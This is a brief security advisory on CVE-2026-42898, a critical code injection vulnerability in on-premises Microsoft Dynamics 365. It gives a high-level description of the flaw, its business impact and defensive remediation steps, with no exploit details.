CVE-2026-42898

Microsoft · Dynamics 365

Microsoft Dynamics 365 (on-premises) contains a code injection vulnerability that allows an authorized attacker to execute arbitrary code over the network.

Executive summary

A critical code injection vulnerability in Microsoft Dynamics 365 (on-premises) could allow an authorized attacker to execute arbitrary code, posing a severe risk to system integrity.

Vulnerability

This vulnerability involves improper control of code generation, resulting in a code injection flaw. It requires the attacker to be authorized within the system to execute code over the network.

Business impact

Successful exploitation of this vulnerability could lead to a total compromise of the Dynamics 365 environment, potentially resulting in unauthorized data access, modification, or complete system takeover. Given the CVSS score of 9.9, this vulnerability is classified as critical, representing a high risk to business operations and data confidentiality.

Remediation

Immediate Action: Update Microsoft Dynamics 365 to the latest version as specified in the official vendor security advisory.

Proactive Monitoring: Monitor server logs for anomalous execution patterns and suspicious network activity originating from authorized accounts.

Compensating Controls: Implement strict network segmentation and ensure that the principle of least privilege is enforced for all authorized users to limit the potential blast radius.

Exploitation status

Public Exploit Available: No

Analyst recommendation

Due to the critical severity score and the potential for remote code execution, organizations should prioritize patching their on-premises Dynamics 365 instances immediately. Verify the latest security bulletins from Microsoft and apply the necessary updates to eliminate this vulnerability.